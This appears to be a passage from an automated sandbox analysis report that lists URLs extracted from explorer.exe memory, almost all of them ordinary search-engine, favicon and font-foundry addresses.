          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000005.00000000.290136363.000000000B1D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
